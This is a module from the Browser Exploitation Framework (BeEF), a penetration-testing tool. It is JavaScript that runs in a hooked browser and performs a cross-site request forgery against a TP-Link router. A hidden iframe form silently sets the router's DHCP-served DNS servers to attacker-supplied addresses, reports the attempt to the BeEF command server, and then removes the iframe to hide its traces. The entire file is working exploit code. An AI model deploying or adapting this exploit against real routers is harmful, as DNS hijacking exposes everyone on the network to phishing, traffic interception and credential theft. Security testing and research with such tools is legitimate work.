//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	// config
	var dhcp_start = '192.168.1.100';
	var dhcp_end   = '192.168.1.199';
	var target  = 'http://<%= @rhost %>/userRpm/LanDhcpServerRpm.htm';
	var dns1    = '<%= @dns1 %>';
	var dns2    = '<%= @dns2 %>';
	var timeout = 15;

	// validate DNS server IP addresses
	if (!beef.net.is_valid_ip(dns1)) {
		beef.debug('Invalid Primary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
		return;
	}
	if (!beef.net.is_valid_ip(dns2)) {
		beef.debug('Invalid Secondary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
		return;
	}

	// change DNS
	var tplink_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'dhcpserver', 'value':'1'},
		{'type':'hidden', 'name':'ip1', 'value':dhcp_start},
		{'type':'hidden', 'name':'ip2', 'value':dhcp_end},
		{'type':'hidden', 'name':'Lease', 'value':'120'},
		{'type':'hidden', 'name':'gateway', 'value':'0.0.0.0'},
		{'type':'hidden', 'name':'domain', 'value':''},
		{'type':'hidden', 'name':'dnsserver', 'value':dns1},
		{'type':'hidden', 'name':'dnsserver2', 'value':dns2},
		{'type':'hidden', 'name':'Save', 'value': unescape('%B1%A3+%B4%E6')}
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(tplink_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

